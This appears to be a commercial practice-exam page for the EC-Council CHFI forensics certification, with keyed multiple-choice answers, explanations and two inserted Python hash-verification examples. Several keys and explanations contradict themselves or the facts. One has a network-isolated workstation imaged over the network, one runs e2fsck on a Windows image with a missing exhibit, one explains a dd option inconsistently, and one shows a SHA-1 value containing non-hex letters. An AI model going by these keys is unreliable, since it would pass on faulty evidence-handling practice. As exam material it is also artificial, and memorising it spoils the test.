© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

EC-Council · Free Practice Questions · Last reviewed May 2026

CHFI Exam Questions and Answers

78 real exam-style questions organised by domain, each with the correct answer highlighted and a plain-English explanation of why it's right — and why the others are wrong.

125 exam questions
240 min time limit
Pass: 700/1000
13 exam domains
Exam domains covered on this page:

1. Computer Forensics Investigation Process
2. Computer Forensics Fundamentals and Process
3. Storage Forensics and File System Analysis
4. Incident Response and First Responder Skills
5. Computer Forensics Lab
6. Evidence Acquisition and Duplication
7. OS and Network Forensics
8. OS and File System Forensics
9. Application, Email and Cloud Forensics
10. Mobile and Malware Forensics
11. Network and Cloud Forensics
12. Database and Application Forensics
13. Malware Forensics

Domain 1: Computer Forensics Investigation Process

Q1 (easy)

During a forensic investigation, an analyst discovers that the suspect's hard drive was encrypted using BitLocker. The analyst has obtained the recovery key. Which of the following is the best next step to ensure data integrity?

A. Decrypt the drive using the recovery key and then create a forensic image.
B. Run a live analysis tool to extract encryption keys from memory.
C. Create a forensic image of the encrypted drive, then decrypt the image.
   Correct: This preserves the original encrypted state and allows analysis of the decrypted image.
D. Boot the suspect computer and copy files to an external drive.

Why: Option C is correct because creating a forensic image of the encrypted drive before decryption preserves the original evidence in its pristine, unaltered state. Decrypting the image later using the recovery key ensures that the original encrypted data remains intact and verifiable, maintaining data integrity throughout the investigation.
Q2 (medium)

A CHFI analyst is called to investigate a suspected data breach. The IT team has already shut down the server. Which of the following is the most appropriate order of actions to preserve evidence?

A. Immediately power on the server to check for running processes.
B. Copy all files from the server to an external USB drive.
C. Run antivirus scan to ensure no malware is present before imaging.
D. Secure the scene, photograph the setup, document connections, remove hard drives, and create forensic images using a write-blocker.
   Correct: This follows proper forensic procedure: secure, document, collect, image with write-blocker.

Why: Option D is correct because it follows the established forensic investigation process: secure the scene to prevent contamination, document the state of the server (photographs and connection diagrams), then physically remove the hard drives and create forensic images using a write-blocker to preserve the original data without alteration. This ensures evidence integrity and admissibility in legal proceedings.
Q3 (hard)

An incident responder has acquired a forensic image of a Linux server suspected of being compromised. The image was taken using 'dd' with no compression. The analyst needs to verify the integrity of the image. Which command should be used and what should be compared?

A. Use 'cmp' to compare the image byte-by-byte with the original drive.
B. Use 'md5sum image.dd' and compare with the original file's MD5 hash provided by the system administrator.
C. Run 'fsck' on the image to check for filesystem errors.
D. Use 'sha256sum image.dd' and compare with the hash computed during acquisition from the source device.
   Correct: SHA-256 is strong and comparing with the hash from the source verifies integrity.

Why: Option D is correct because the SHA-256 hash computed during acquisition from the source device provides a cryptographic integrity check. By recomputing the hash on the acquired image and comparing it to the original hash, the analyst can verify that the image is an exact bit-for-bit copy without any alteration or corruption. SHA-256 is preferred over MD5 in forensic contexts due to its stronger collision resistance.
Q4 (medium)

Which TWO of the following are considered essential steps in the computer forensics investigation process according to EC-Council guidelines?

A. Identification of potential evidence
   Correct: Identification is the first step in the forensic process.
B. Data recovery from damaged media
C. Deletion of irrelevant data
D. Preservation of the integrity of evidence
   Correct: Preservation is critical to maintain chain of custody.
E. Public disclosure of findings

Why: Identification of potential evidence is a core initial step in the EC-Council's computer forensics investigation process because it defines the scope and sources of data that may contain relevant evidence. Without proper identification, investigators risk missing critical data or collecting irrelevant information, which can compromise the entire investigation. This step involves recognizing potential evidence sources such as hard drives, network logs, and volatile memory, ensuring that all relevant data is accounted for before collection begins.
Q5 (medium)

An analyst executed the commands shown in the exhibit on a Windows system to prepare a forensic image for analysis. What is the most likely reason for the error message from e2fsck?

A. The analyst failed to properly dismount the source volume before imaging, leading to filesystem inconsistencies.
   Correct: The fsutil dismount command was run on C:, but the image was taken later, possibly without ensuring the volume was cleanly unmounted.
B. The forensic image was not acquired with a write-blocker, causing data corruption.
C. The image file contains an NTFS filesystem, but e2fsck is designed for ext filesystems.
D. The e2fsck command syntax is incorrect; it should be 'e2fsck -f -n' instead.

Why: The error message from e2fsck indicates that the filesystem has inconsistencies, which typically occur when a volume is imaged while it is still mounted and actively being written to. The analyst likely did not dismount the source volume before acquiring the forensic image, resulting in a snapshot that reflects an inconsistent state (e.g., dirty journal, unflushed writes). This is a common chain-of-custody and acquisition procedure error in forensic imaging.
Q6 (hard)

You are a CHFI analyst responding to a security incident at a medium-sized financial firm. The IT team reports that an employee's workstation (Windows 10, single SSD) was used to access sensitive customer data without authorization. The workstation is still running, and the employee is currently logged in. The IT team has isolated the machine from the network but has not powered it off. You have been called to perform forensic acquisition. The company policy requires preservation of volatile data and a full disk image. The machine has 16 GB RAM and a 512 GB SSD. You have a forensic toolkit including FTK Imager, win32dd (for memory acquisition), and a write-blocker. Which of the following is the best course of action?

A. Use win32dd to capture the contents of RAM to an external drive, then use FTK Imager to create a physical image of the SSD over the network to a secure share.
   Correct: This captures memory first (volatile data) and then acquires a disk image while the system is still running, preserving evidence.
B. Perform a graceful shutdown via the operating system, then remove the SSD and image it using a hardware write-blocker.
C. Boot the workstation from a forensic live CD, then use 'dd' to image the SSD to an external USB drive.
D. Immediately shut down the workstation by unplugging the power cord, remove the SSD, and create a forensic image using a write-blocker on a forensic workstation.

Why: Option A is correct because it follows the proper order of volatility: capturing RAM first (volatile data) using win32dd, then imaging the SSD with FTK Imager. Since the machine is still running and isolated, network imaging is acceptable and preserves the disk state without risking data loss from a shutdown. This approach complies with the requirement to preserve volatile data and create a full disk image.


Domain 2: Computer Forensics Fundamentals and Process

Q1 (easy)

A first responder arrives at a crime scene where a computer is running. According to standard forensic procedure, what should the responder do FIRST?

A. Photograph the scene and secure the area
   Correct: Securing and photographing the scene ensures preservation of the original state.
B. Connect a write blocker and create a forensic image immediately
C. Immediately shut down the computer to prevent data alteration
D. Pull the power cord to ensure the system does not shut down normally

Why: Option A is correct because the first priority at a live crime scene is to preserve the integrity of the scene and all potential evidence. Standard forensic procedure (e.g., from NIST SP 800-86 and ACPO guidelines) mandates that the first responder must photograph the scene to document the state of the computer (including screen contents, cables, and peripherals) and secure the area to prevent unauthorized access or tampering. Only after this documentation and scene stabilization can the responder proceed to handle the live system, such as capturing volatile data or creating a forensic image.
Q2 (medium)

During a forensic investigation, an analyst uses a hardware write blocker to connect a suspect hard drive to a forensic workstation. What is the primary purpose of using a hardware write blocker?

A. To prevent the operating system from writing to the source drive
   Correct: This is the core function: blocking write commands to preserve evidence.
B. To speed up the data transfer rate during imaging
C. To compress the forensic image to save storage space
D. To automatically hash the drive contents for integrity verification

Why: A hardware write blocker physically intercepts the write commands from the forensic workstation to the suspect drive, ensuring that no data can be altered on the source drive during acquisition. This preserves the evidentiary integrity of the original media, which is a foundational requirement in digital forensics to maintain a chain of custody and admissibility in court.
Q3 (hard)

A forensic investigator is preparing to acquire the contents of a live system's RAM. Which of the following tools is specifically designed for this purpose and captures memory without altering the system state?

A. Tableau write blocker
B. EnCase
C. FTK Imager
   Correct: FTK Imager includes a memory capture feature that preserves the system state.
D. dd

Why: FTK Imager is specifically designed for live memory acquisition on Windows systems, capturing RAM contents via a kernel-level driver (e.g., win32dd or FTK Imager's own memory capture module) that reads physical memory without modifying the system state. It creates a forensic image (e.g., .mem or .raw) while maintaining data integrity through hashing (MD5/SHA1). This makes it the correct choice for acquiring RAM from a live system without altering evidence.
Q4 (medium)

During a forensic investigation, an analyst creates a forensic image using `dcfldd` with the command: `dcfldd if=/dev/sda of=image.dd hash=sha256 hashwindow=10M`. What is the purpose of the `hashwindow` parameter?

A. It limits the total amount of data to hash to 10 MB
B. It creates a hash for every 10 MB block of data
   Correct: This allows verification of each 10 MB segment independently.
C. It sets the hash algorithm to SHA-256
D. It enables error correction for every 10 MB

Why: The `hashwindow` parameter in `dcfldd` specifies the size of the data chunks for which individual hash values are computed. With `hashwindow=10M`, the tool generates a SHA-256 hash for every 10 MB block of the input data, allowing verification of integrity on a per-block basis rather than only a single hash for the entire image. This is useful for detecting corruption or tampering in specific segments of large forensic images.
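The per-window hashing that `hashwindow` describes, together with the whole-image check from the `sha256sum` question in Domain 1, as an added Python example (this is not Courseiva's code or part of dcfldd; the image bytes are a constructed stand-in for a real acquisition, and the 1 KB window stands in for dcfldd's 10 MB window so the example runs instantly). It goes one step further than the explanation: given the window hashes recorded at acquisition time, it reports which byte ranges of a later copy no longer match, which a single whole-image hash cannot tell you.

```python
import hashlib
from typing import List, Tuple

# Window size for the example. dcfldd's hashwindow=10M would be 10 * 1024 * 1024;
# 1 KB keeps the constructed sample small.
WINDOW = 1024


def make_sample_image(size: int = 4096, seed: int = 7) -> bytes:
    """Deterministic pseudo-random bytes standing in for a dd/dcfldd image (constructed data)."""
    out = bytearray()
    x = seed
    while len(out) < size:
        x = (x * 1103515245 + 12345) & 0xFFFFFFFF  # simple LCG, enough for sample data
        out += x.to_bytes(4, "little")
    return bytes(out[:size])


def whole_hash(data: bytes, algo: str = "sha256") -> str:
    """One hash over the entire image, the same value `sha256sum image.dd` would print."""
    return hashlib.new(algo, data).hexdigest()


def window_hashes(data: bytes, window: int = WINDOW, algo: str = "sha256") -> List[Tuple[int, int, str]]:
    """Per-window hashes, mirroring `hash=sha256 hashwindow=N`.

    Returns (start_offset, end_offset, hexdigest) for each window, in order.
    The final window may be shorter than `window` when the image size is not a multiple of it.
    """
    result = []
    for start in range(0, len(data), window):
        chunk = data[start:start + window]
        result.append((start, start + len(chunk), hashlib.new(algo, chunk).hexdigest()))
    return result


def verify(source_hashes: List[Tuple[int, int, str]], image: bytes,
           window: int = WINDOW, algo: str = "sha256") -> List[Tuple[int, int]]:
    """Compare acquisition-time window hashes with hashes recomputed over a copy.

    Returns the (start, end) byte ranges that do not match; an empty list means every
    window is identical. A copy that is shorter or longer than the source shows up as
    mismatched trailing windows rather than being silently accepted.
    """
    image_hashes = window_hashes(image, window, algo)
    mismatched = []
    for i in range(max(len(source_hashes), len(image_hashes))):
        if i >= len(source_hashes) or i >= len(image_hashes):
            # One side has a window the other lacks: the sizes differ.
            start = i * window
            mismatched.append((start, start + window))
            continue
        if source_hashes[i] != image_hashes[i]:
            mismatched.append((source_hashes[i][0], source_hashes[i][1]))
    return mismatched


if __name__ == "__main__":
    original = make_sample_image()
    recorded = window_hashes(original)          # what dcfldd would log at acquisition
    print("whole image:", whole_hash(original))
    print("faithful copy mismatches:", verify(recorded, original))

    tampered = bytearray(original)
    tampered[2500] ^= 0xFF                      # flip one byte in the third window
    print("tampered copy mismatches:", verify(recorded, bytes(tampered)))
```

Running it prints the whole-image digest, an empty mismatch list for the faithful copy, and `[(2048, 3072)]` for the tampered copy: the single whole-image hash would only say "different", while the window hashes localise the change to one segment, which is the practical reason for the `hashwindow` option on multi-terabyte acquisitions.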
Q5 (easy)

What is the primary goal of the chain of custody in a digital forensic investigation?

A. To maintain the integrity and admissibility of evidence
   Correct: This is the main purpose: to show that evidence has not been tampered with.
B. To encrypt the evidence during transport
C. To speed up the forensic analysis process
D. To ensure that the forensic tools used are properly licensed

Why: The chain of custody is a documented chronological record that tracks the seizure, custody, control, transfer, analysis, and disposition of digital evidence. Its primary goal is to maintain the integrity and admissibility of evidence by proving that the evidence has not been tampered with or altered from the moment it was collected until it is presented in court. This is critical because any break in the chain can lead to evidence being deemed inadmissible under rules like the Federal Rules of Evidence (FRE) or the Daubert standard.
Q6 (medium)

A forensic analyst is examining a hard drive that was seized from a suspect's home. The analyst uses FTK Imager to create a forensic image. After imaging, the analyst computes the MD5 hash of the image and compares it to the hash computed at the scene. The hashes match. What does this confirm?

A. The file system is intact and readable
B. The image is an exact bit-for-bit copy of the original drive
   Correct: Hash matching verifies data integrity.
C. The drive contains malware
D. The drive was not encrypted

Why: B is correct because a matching MD5 hash between the image and the original drive confirms that the forensic image is an exact bit-for-bit copy. Hashing algorithms like MD5 produce a unique fixed-size hash value based on the binary content; if two hashes match, the data is identical with no alterations. This validates the integrity of the acquisition process, ensuring that the image is a perfect forensic duplicate.


Domain 3: Storage Forensics and File System Analysis

Q1 (easy)

An analyst recovers a hard drive from a suspect's computer. The drive has a partition table that uses a 32-bit identifier and a maximum partition size of 2 TB. Which partition table type is present?

A. HFS+
B. GPT
C. APFS
D. MBR
   Correct: MBR uses 32-bit partition table entries with a maximum partition size of 2 TB.

Why: MBR uses 32-bit partition table entries and supports up to 2 TB partitions. GPT uses 64-bit entries and supports larger disks.
Q2 (easy)

During a forensic investigation, an examiner wants to recover deleted files from a FAT32 file system. Which structure is most critical for file recovery?

A. File Allocation Table (FAT)
   Correct: FAT stores cluster chains; deleted files may have their directory entries and FAT chains intact.
B. Master File Table (MFT)
C. Journal
D. Inode table

Why: The File Allocation Table (FAT) contains cluster chains for files; deleted entries may still be recoverable if not overwritten.
Q3 (easy)

Which tool is specifically designed for file carving and can recover files based on headers and footers without relying on file system metadata?

A. FTK Imager
B. Foremost
   Correct: Foremost is a command-line file carver that recovers files based on headers, footers, and data structures.
C. Autopsy
D. Volatility

Why: Foremost is a file carving tool that uses headers/footers. Autopsy and FTK have carving modules but Foremost is dedicated to it.
Q4 (medium)

An analyst notices that a file on an NTFS volume occupies 4096 bytes on disk but its actual data is only 100 bytes. The extra space contains remnants of a previously deleted file. What is this extra space called?

A. Volume slack
B. Free space
C. RAM slack
D. File slack
   Correct: File slack is the unused space in the last cluster of a file that may contain data from other files.

Why: File slack is the unused space between the end of the file data and the end of the last cluster allocated to the file.
Q5 (medium)

A forensic investigator is analyzing a Linux ext4 file system. They suspect a file was deleted but its inode may still be intact. Which tool can be used to recover the file by referencing the inode?

A. dd
B. scalpel
C. foremost
D. debugfs
   Correct: debugfs can be used to inspect and recover files from ext file systems by inode.

Why: The 'debugfs' tool can access ext2/3/4 file systems directly and recover files from inodes. 'extundelete' also works, but debugfs is more versatile.
Q6 (medium)

During a forensic examination of an NTFS drive, an investigator finds that a file 'notes.txt' has an additional data stream named 'hidden.txt' attached. Which feature of NTFS allows this?

A. USN Journal
B. MFT
C. Alternate Data Streams (ADS)
   Correct: ADS allows hiding data in separate streams attached to a file.
D. Slack space

Why: C is correct because NTFS supports Alternate Data Streams (ADS), a feature that allows multiple data streams to be associated with a single file. The 'hidden.txt' stream attached to 'notes.txt' is a classic example of ADS, which can be used to hide data or store metadata without affecting the file's primary content.


Domain 4: Incident Response and First Responder Skills

Q1 (easy)

An analyst receives an alert indicating a suspicious process (PID 3342) is making outbound connections on port 443 to an unknown IP. The system is a Windows 10 workstation. Which first responder action is MOST appropriate?

A. Capture a full memory dump using a tool like FTK Imager (Memory Capture) or DumpIt.
   Correct: Memory capture preserves running processes, network connections, and other volatile data crucial for analysis.
B. Immediately disconnect the system from the network to contain the threat.
C. Check the Windows Event Logs for related entries.
D. Reboot the system to clear any malicious processes from memory.

Why: Capturing a full memory dump (option A) is the most appropriate first responder action because it preserves the volatile state of the suspicious process (PID 3342) and its associated artifacts (e.g., network connections, loaded DLLs, encryption keys) before any further system changes occur. This allows forensic analysis to identify the malware's behavior, such as command-and-control (C2) communication over port 443 (HTTPS), without altering evidence. Tools like FTK Imager (Memory Capture) or DumpIt acquire a raw .mem file that can be analyzed with Volatility or Rekall to extract process details, network sockets, and injected code.
Q2 (medium)

A security team suspects a data breach via an external attacker. The incident response plan requires preservation of evidence for legal proceedings. Which order of volatility should the first responder follow?

A. Capture disk image, then memory, then network connections.
B. Record network connections, capture disk image, then memory.
C. Capture memory, record network connections, acquire disk image, then collect backups.
   Correct: This follows the correct order of volatility from most to least volatile.
D. Collect backups first, then disk image, then memory.

Why: Option C is correct because the order of volatility (OOV) dictates that the most volatile data (memory/registers) must be captured first, followed by network connections, then disk images, and finally backups. This sequence minimizes data loss and ensures evidence integrity for legal proceedings, as volatile data is lost when power is removed.
Q3 (hard)

During an incident response, a first responder needs to collect evidence from a Linux server that is still running. The server has sensitive data and cannot be shut down. Which technique is BEST for acquiring a forensic image of the hard disk?

A. Use dd if=/dev/sda of=/mnt/evidence/image.dd conv=noerror,sync
B. Use dd if=/dev/sda of=/mnt/evidence/image.dd bs=4M
   Correct: dd copying the entire disk (/dev/sda) creates a complete forensic image.
C. Use dd if=/dev/mapper/root of=/mnt/evidence/image.dd
D. Use dd if=/dev/sda1 of=/mnt/evidence/image.dd

Why: Option B is correct because it uses dd with a 4M block size, which improves acquisition speed while still producing a bit-for-bit forensic image of the entire disk (/dev/sda). The conv=noerror,sync option in A is unnecessary for a live acquisition from a healthy disk and can mask read errors, while B's larger block size is more efficient for imaging a running system without shutdown.
Q4 (easy)

A first responder arrives at a scene where a computer is powered on and a user is logged in. An incident is suspected. What should the responder do FIRST?

A. Begin capturing a memory dump using a forensic tool.
B. Power off the computer immediately to preserve the disk.
C. Photograph the screen to document the current state.
   Correct: Documentation of the live state is critical before any collection.
D. Ask the user to log off so the system can be imaged.

Why: Option C is correct because the first priority at a live incident scene is to preserve volatile evidence. Photographing the screen captures the current state of the system, including open applications, network connections, and user activity, which can be lost if the system is altered or powered down. This documentation provides a baseline for the investigation and ensures that critical volatile data is recorded before any forensic acquisition begins.
Q5 (medium)

You are responding to a suspected malware infection on a Windows 10 system. The system is still running. Which of the following should you collect FIRST?

A. Acquire a memory dump using a tool like WinPmem.
   Correct: Memory is the most volatile and must be captured first.
B. Collect the Windows Event Logs.
C. Export the contents of the Windows Registry.
D. Create a forensic image of the hard drive.

Why: When a system is still running and suspected of malware infection, the first priority is to capture volatile data, which includes the contents of RAM. WinPmem is a tool designed to acquire a memory dump from a live Windows system, preserving critical evidence such as running processes, network connections, and injected code that would be lost on shutdown. This follows the order of volatility (RFC 3227), which mandates collecting memory before any non-volatile data like logs, registry, or disk images.
Q6 (hard)

During an incident response, a first responder needs to preserve the integrity of evidence. Which action ensures the best chain of custody?

A. Use a write blocker when acquiring the disk image.
B. Compute a SHA-256 hash of the acquired image immediately after collection and record it in the chain of custody form.
   Correct: Hashing provides a verifiable integrity check.
C. Document every person who handled the evidence.
D. Place the evidence in an evidence bag and lock it in a secure room.

Why: Option B is correct because computing a SHA-256 hash immediately after acquisition creates a cryptographic fingerprint of the image. This hash, when recorded in the chain of custody form, provides verifiable integrity: any subsequent alteration of the image will produce a different hash, proving tampering. While other steps are important, only hashing directly ties the evidence's integrity to a mathematical proof that can be independently verified later.


Domain 5: Computer Forensics Lab

Q1 (medium)

During a forensic investigation, an analyst needs to acquire data from a live Windows system without altering the system's state. Which tool should the analyst use to capture the contents of RAM?

A. dd
B. FTK Imager Lite
   Correct: FTK Imager Lite is designed to capture RAM from a live system without altering the system's state.
C. EnCase
D. WinHex

Why: FTK Imager Lite is designed for live forensic acquisition on Windows systems, including capturing RAM contents without altering the system state. It uses a lightweight, read-only approach that avoids writing to the disk or modifying memory pages, preserving the integrity of the evidence.
Q2 (hard)

A forensic lab is designing a network architecture to ensure the integrity of evidence during acquisition. What is the most critical design consideration?

A. Deploy multiple forensic workstations to parallelize tasks
B. Use a segmented network to isolate forensic tools
C. Encrypt all data in transit over the network
D. Implement hardware write-blockers on all acquisition stations
   Correct: Write-blockers prevent any writes to the source drive, ensuring integrity.

Why: Hardware write-blockers are the most critical design consideration because they physically prevent any write operations to the source drive at the ATA/SCSI command level, ensuring that the evidence remains bit-for-bit unchanged during acquisition. Without a hardware write-blocker, even a single read operation from a forensic workstation could inadvertently modify metadata (e.g., last access timestamps) or trigger anti-forensic mechanisms, compromising the integrity of the evidence and its admissibility in court.
Q3 (easy)

A forensic analyst is troubleshooting a write-blocker that is not working correctly. The analyst connected the write-blocker between the suspect drive and the forensic workstation, but the workstation still shows the drive as writable. What is the most likely cause?

A. The suspect drive was connected before the write-blocker was powered on
   Correct: Connecting the drive before powering the write-blocker can bypass the write-block.
B. The write-blocker does not have external power
C. The suspect drive uses SATA but the write-blocker is USB-only
D. The write-blocker is connected to the suspect drive's output port

Why: When a write-blocker is powered on after the suspect drive is already connected, the drive may have already been enumerated by the operating system as a writable device. Write-blockers rely on intercepting and filtering ATA/SCSI commands at the hardware level before the OS sees the drive; if the drive is connected first, the OS may have already sent write commands or cached write attributes, bypassing the blocker's protection. This is why the proper sequence is to power on the write-blocker first, then connect the suspect drive.
Q4 (medium)

A forensic lab is establishing a chain of custody procedure. Which practice is considered best according to CHFI guidelines?

A. Require biometric authentication for all lab personnel
B. Store evidence in a secure room with limited access
C. Use encryption to protect evidence files
D. Document every transfer of evidence with signatures and timestamps
   Correct: Documentation is key to maintaining chain of custody.

Why: Option D is correct because the chain of custody is fundamentally a legal and procedural requirement to demonstrate the integrity and admissibility of digital evidence. CHFI guidelines emphasize that every transfer of evidence must be meticulously documented with signatures, timestamps, and purpose to create an unbroken audit trail, which is the only practice that directly satisfies the legal standard for evidence handling.
Q5 (hard)

Which TWO of the following are essential components of a computer forensics lab according to CHFI best practices?

A. Server farm for data processing
B. Evidence storage area with controlled access
   Correct: Critical for evidence integrity.
C. Public-facing website for case management
D. Coffee machine for staff convenience
E. Forensic workstation with specialized software
   Correct: Required for analysis.

Why: Option B is correct because a computer forensics lab must have a secure evidence storage area with controlled access to maintain the chain of custody and prevent tampering or unauthorized access to digital evidence. CHFI best practices emphasize physical security controls, such as biometric locks or access logs, to ensure evidence integrity throughout the investigation lifecycle.
Q6 (medium)

Which THREE of the following are recommended practices for maintaining the integrity of digital evidence in a forensics lab?

A. Maintain a detailed chain of custody log
   Correct: Documents handling and prevents tampering.
B. Generate cryptographic hashes of evidence files
   Correct: Hashes verify that evidence has not been altered.
C. Use hardware write-blockers during acquisition
   Correct: Prevents modification of source drive.
D. Perform regular backups of all evidence
E. Run antivirus scans on evidence before analysis

Why: Maintaining a detailed chain of custody log (Option A) is a recommended practice because it provides a verifiable, chronological record of every person who handled the evidence, the time and date of each transfer, and the purpose of each transfer. This ensures the evidence's integrity by demonstrating that it has not been tampered with or altered from the moment of seizure through analysis and presentation in court. Without a proper chain of custody, the evidence can be challenged as inadmissible under rules like Federal Rule of Evidence 901.


Domain 6: Evidence Acquisition and Duplication

Q1 (medium)

During a forensic investigation, you are asked to acquire the contents of RAM from a live Windows 10 system without causing system instability. Which tool would be most appropriate for this task?

A. LiME
B. DumpIt
C. FTK Imager
D. Belkasoft RAM Capturer
   Correct: Belkasoft RAM Capturer is designed for Windows live RAM acquisition and is stable.

Why: Belkasoft RAM Capturer is the most appropriate tool for acquiring RAM from a live Windows 10 system because it is designed specifically for live memory acquisition on Windows, uses a lightweight kernel-mode driver to read physical memory without causing system instability, and supports acquisition from 64-bit systems. Unlike other tools, it minimizes interaction with the target process list and avoids loading unnecessary user-mode components that could trigger crashes or alter the memory state.

Q2 (hard)

You are imaging a suspect's hard drive using a write blocker and dd command. After imaging, you verify the hash of the original drive and the image file. The original drive hash is SHA1: A1B2C3D4E5..., and the image hash is SHA1: F6G7H8I9J0... What is the most likely cause of the mismatch?

A

The dd command used a different block size

B

The write blocker malfunctioned and allowed writes to the original drive

If the original drive was modified during acquisition, the hashes will differ.

C

The dd command compressed the output

D

The image file was corrupted during transfer

Why: The hash mismatch indicates that the data on the original drive and the image file are not identical. A write blocker malfunction that allowed writes to the original drive during the imaging process would alter the source data after the initial hash was computed, causing the final hash of the original drive to differ from the hash of the image file taken at a different point in time. This is the most direct cause of a hash mismatch because the write blocker's primary purpose is to prevent any modification to the evidence.
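
The verification step this question turns on, as an added Python example that is not part of the original page: the same chunked SHA-256 is run over the evidence source and over the image, and the two digests are compared. The "drive" here is a constructed temporary file, not a real device, and the final write to the source simulates exactly the write-blocker failure described in the answer.

```python
import hashlib
import os
import tempfile

CHUNK = 1024 * 1024  # 1 MiB reads, so multi-GB images never have to fit in RAM


def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 in fixed-size chunks and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def verify_image(source_path: str, image_path: str) -> dict:
    """Hash the evidence source and its image and report whether they agree.

    A match shows the image is bit-for-bit identical to the source as it was
    when each hash was taken; a mismatch means one side changed, which is what
    a write slipping through to the source (or a corrupted copy) looks like.
    """
    src = sha256_of(source_path)
    img = sha256_of(image_path)
    return {"source_sha256": src, "image_sha256": img, "match": src == img}


def demo() -> tuple:
    """Constructed scenario: a 4 MiB 'drive', a dd-style full copy, then a single
    byte written to the source after imaging. Returns (match_before, match_after)."""
    with tempfile.TemporaryDirectory() as d:
        source = os.path.join(d, "suspect_drive.bin")  # stands in for the evidence drive
        image = os.path.join(d, "suspect_drive.dd")    # stands in for the raw image

        with open(source, "wb") as f:
            f.write(os.urandom(4 * CHUNK))

        # Imaging: a complete sector-by-sector copy, as dd would produce.
        with open(source, "rb") as s, open(image, "wb") as t:
            for block in iter(lambda: s.read(CHUNK), b""):
                t.write(block)
        clean = verify_image(source, image)

        # Simulate a write reaching the source drive after acquisition.
        with open(source, "r+b") as f:
            f.seek(512)
            original = f.read(1)
            f.seek(512)
            f.write(bytes([original[0] ^ 0xFF]))
        tampered = verify_image(source, image)

    return clean["match"], tampered["match"]


if __name__ == "__main__":
    print(demo())
```

In practice the source is hashed before imaging, the image is hashed, and the source is hashed again afterwards, with all three digests recorded in the chain-of-custody log. Having the pre-acquisition source hash is what lets an examiner tell the two plausible causes apart: if the source's post-acquisition hash differs from its pre-acquisition hash, something wrote to the evidence drive; if the source hashes agree but the image differs, the image itself is bad.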

Q3 (easy)

A forensic examiner needs to acquire a hard drive that is part of a RAID 5 array. The RAID controller is unavailable. What is the best approach to acquire the data?

A

Acquire each disk individually, then reconstruct the array using software

This is the standard method when the controller is unavailable.

B

Acquire only one disk because RAID 5 can be reconstructed from a single disk

C

Use a hardware write blocker that supports RAID

D

Connect the RAID array to a similar controller and acquire as a single drive

Why: When the RAID controller is unavailable, the only reliable method to acquire the data is to image each physical disk individually using a forensic write blocker, then reconstruct the logical RAID 5 volume in a forensic software tool (e.g., FTK Imager, X-Ways Forensics, or EnCase). This preserves the original evidence on each disk and allows the examiner to rebuild the array by specifying the stripe size, parity rotation, and disk order, which is essential because RAID 5 distributes data and parity across all disks and can tolerate a single disk failure.

Q4 (medium)

During a network forensic investigation, you need to capture live network traffic from a switch span port. Which tool would best capture the traffic in a forensically sound manner?

A

Nmap

B

Wireshark

Wireshark captures packets and can save them in standard formats.

C

Netcat

D

Tcpdump

Why: Wireshark is the best tool for capturing live network traffic from a switch SPAN port in a forensically sound manner because it provides a robust graphical interface for real-time packet capture and analysis, supports full packet capture with timestamps, and can write captures directly to a pcapng file format that preserves packet integrity and metadata. Its ability to run in promiscuous mode ensures all traffic from the SPAN port is captured without altering the data, meeting forensic requirements for accuracy and completeness.

Q5 (hard)

You are acquiring a laptop with a self-encrypting drive (SED) that is powered on and logged in. What is the best method to acquire the drive while preserving encrypted data?

A

Remove the drive and use a forensic bridge that supports SED

B

Power off the laptop and image the drive using a hardware write blocker

C

Acquire a logical image from the running operating system

Since the system is logged in, the data is decrypted and accessible.

D

Boot from a forensic live CD and image the drive

Why: When a self-encrypting drive (SED) is powered on and logged in, the drive's hardware encryption key is already loaded and the data is accessible through the operating system. The best method to preserve the encrypted data in its decrypted state is to acquire a logical image from the running OS, which captures files and metadata without powering off the drive and losing the decryption context. Removing power or rebooting would cause the SED to lock, requiring the authentication key again and potentially altering the data state.

Q6 (easy)

Which of the following is the primary purpose of using a hardware write blocker during disk acquisition?

A

To decrypt the drive during acquisition

B

To prevent any writes to the original evidence drive

This ensures the integrity of the evidence.

C

To compress the acquired image

D

To increase the speed of the acquisition

Why: A hardware write blocker is a device placed between the suspect drive and the forensic workstation that intercepts and blocks any write commands from the host operating system, ensuring that the original evidence drive remains unaltered. This is critical for maintaining the integrity of digital evidence, as any modification to the source drive could render it inadmissible in court. The primary purpose is therefore to prevent any writes to the original evidence drive, preserving its exact state for forensic analysis.


Domain 7: OS and Network Forensics


Q1 (easy)

A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?

A

A failed logon attempt

4625 is the event ID for failed logon.

B

A successful user logon

C

A service was installed

D

A new user account was created

Why: Event ID 4625 indicates a failed logon attempt. This is a standard Windows security event used to track authentication failures.

Q2 (medium)

During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?

A

/var/log/syslog

B

~/.bash_history

This file logs commands entered in bash.

C

/proc/1/cmdline

D

/etc/shadow

Why: The bash_history file for each user (typically ~/.bash_history) stores command-line history. Even if auth.log is cleared, this file often retains command entries.

Q3 (hard)

A forensic analyst recovers a USB device from a suspect's computer. Which Windows registry key should be examined to determine the first time the USB device was connected?

A

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB

B

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

C

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR

Tracks USB storage devices and their first/last connect times.

D

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2

Why: The USBSTOR key records serial numbers and first/last connection times for USB storage devices.

Q4 (medium)

An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?

A

7045

Service installation event.

B

4624

C

4648

D

4720

Why: Event ID 7045 indicates a service was installed on the system, which attackers often use to maintain persistence.

Q5 (medium)

A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?

A

.plist files

B

FSEvents

C

Unified logging (log command)

Centralized logging system for macOS.

D

Console.app logs

Why: Unified logging (via log command) captures system and user activity in a centralized database, replacing traditional syslog.

Q6 (easy)

In Windows forensics, which artifact is used to track recently accessed files and folders via the 'Recent Items' feature?

A

Jump lists

B

ShellBags

C

Prefetch files

D

LNK files

LNK files track file access via shortcuts.
